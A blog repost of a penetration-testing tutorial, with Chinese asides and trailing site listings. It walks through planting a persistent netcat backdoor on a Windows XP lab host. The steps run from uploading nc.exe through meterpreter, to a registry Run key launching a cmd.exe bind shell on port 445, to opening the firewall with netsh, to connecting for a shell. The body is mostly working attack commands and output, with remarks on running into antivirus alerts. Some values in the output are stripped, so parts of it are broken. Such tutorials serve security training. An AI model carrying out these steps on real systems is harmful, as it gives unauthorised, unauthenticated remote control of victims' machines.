In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

[*] uploading  : /tmp/nc.exe -> C:\windows\system32

[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

  Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values ():

    VMware Tools

    VMware User Process

    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

Successful set nc.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: nc

Type: REG_SZ

Data: C:\windows\system32\nc.exe -Ldp  -e cmd.exe

  使用命令行自带的reg命令也行, 前提是系统杀毒软件不出提示:

REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"

  Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i

Process  created.

Channel  created.

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode

Netsh firewall show opmode

Domain profile configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Standard profile configuration (current):

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Local Area Connection firewall configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

  We open up port 445 in the firewall and double-check that it was set properly.

C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening

netsh firewall show portopening

Port configuration for Domain profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   Service Firewall

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

C:\Documents and Settings\Jim\My Documents >

  So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128

172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [172.16.104.128]  (?) open

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim > dir

dir

Volume in drive C has no label.

Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim

// : AM

.

// : AM

..

// : AM  ;i

// : PM

Desktop

// : PM

Favorites

// : PM

My Documents

// : AM  QCY

// : AM

Start Menu

// : AM  talltelnet.log

// : AM  talltftp.log

 File(s)  bytes

 Dir(s) ,,, bytes free

C:\Documents and Settings\Jim >

  Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.

  .使用sc创建自定义服务,留下后门, 但是有个问题是360还是会提示, 防止注册表被写入

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://sqqihao.github.io/
QQ:287101329

微信:18101055830

Persistent Netcat Backdoor的更多相关文章

  1. Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

    Microsoft Windows .Reg文件对话框消息欺骗 0day 概述 扩展名为.reg的文件是Windows注册表中使用的注册文件.这些文件可以包含hives.密钥和值..reg文件可以在文 ...

  2. Persistent Data Structures

    原文链接:http://www.codeproject.com/Articles/9680/Persistent-Data-Structures Introduction When you hear ...

  3. CodeForces #368 div2 D Persistent Bookcase DFS

    题目链接:D Persistent Bookcase 题意:有一个n*m的书架,开始是空的,现在有k种操作: 1 x y 这个位置如果没书,放书. 2 x y 这个位置如果有书,拿走. 3 x 反转这 ...

  4. coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores.

    最近在修改一个程序BUG的时候遇到一个问题coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores. 但实际跑程序 ...

  5. Exception loading sessions from persistent storage

    严重: Exception loading sessions from persistent storage java.io.EOFException 删除Tomcat里面的work/Catalina ...

  6. 【Codeforces-707D】Persistent Bookcase DFS + 线段树

    D. Persistent Bookcase Recently in school Alina has learned what are the persistent data structures: ...

  7. netcat命令

    1 简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netc ...

  8. nc 局域网聊天+文件传输(netcat)

    nc 局域网聊天+文件传输 nc的全程是netcat,这个工具非常好用. 有时候我们需要在局域网内传送一些文本消息或者文件的时候,通常的做法是安装一些局域网通讯软件,然后来做.其实不必要这样,使用nc ...

  9. POJ - 3652 Persistent Bits

    “模拟”类型,题型容易,使用bitset库对二进制逐位操作,初始化.十进制转二进制(unsigned int).位操作. POJ - 3652 Persistent Bits Time Limit:  ...

随机推荐

  1. 在ASP.NET MVC中实现区域或城市选择

    每次在"万达影城"网上购票总会用到左上角选择城市的功能.如下: 今天就在ASP.NET MVC中实现一下.我想最好的方式应该是写一个插件,但自己在这方面的功力尚欠缺,如果大家在这方 ...

  2. Android:调用其他程序中的activity和Permission Denial: starting Intent 错误解决办法

    今天想调试多个task中栈的情况,在测试程序中调用另一个程序的activity, 代码片段如下: btnStartX=(Button)findViewById(R.id.btnStartX); btn ...

  3. React中的的JSX

    什么是JSX? JSX是JavaScript XML的缩写,其本质是js,表现形式类似于XML,与js区别在于可直接在里面编写html标签. 怎么使用JSX? 语法规则: JSX 的基本语法规则:HT ...

  4. 使用PHP+Sphinx建立高效的站内搜索引擎

      1.    为什么要使用Sphinx   假设你现在运营着一个论坛,论坛数据已经超过100W,很多用户都反映论坛搜索的速度非常慢,那么这时你就可以考虑使用Sphinx了(当然其他的全文检索程序或方 ...

  5. 使用WebRTC搭建前端视频聊天室

    在两个浏览器中,为聊天.游戏.或是文件传输等需求发送信息是十分复杂的.通常情况下,我们需要建立一台服务器来转发数据,当然规模比较大的情况下,会扩展成多个数据中心.这种情况下很容易出现很高的延迟,同时难 ...

  6. 分布式系统唯一ID生成方案汇总 转

    系统唯一ID是我们在设计一个系统的时候常常会遇见的问题,也常常为这个问题而纠结.生成ID的方法有很多,适应不同的场景.需求以及性能要求.所以有些比较复杂的系统会有多个ID生成的策略.下面就介绍一些常见 ...

  7. 每天一个linux命令-wc命令

    语法:wc [选项] 文件… 说明:该命令统计给定文件中的字节数.字数.行数.如果没有给出文件名,则从标准输入读取.wc同时也给出所有指定文件的总统计数.字是由空格字符区分开的最大字符串. 该命令各选 ...

  8. 用layer-list实现图片旋转叠加、错位叠加、阴影、按钮指示灯

    先来看看一个简单的文件: <?xml version="1.0" encoding="utf-8"?> <layer-list xmlns:a ...

  9. Android Studio快捷键之代码提示

    相信很多人在用Eclipse的时候,很习惯的都会把Content Assist设置成.abcd...z,这样每次敲代码的时候都会有自动提示,写起代码来很方便.具体设置如图: 同时,Eclipse中也有 ...

  10. Qt中对QDomDocument和QDomnode的理解

    一.对QDomDocument和QDomnode的理解 QDom前缀的都是代表节点类型.所以有,QDomElement代表一个Element节点,而QDomText代表一个Text节点.QDomNod ...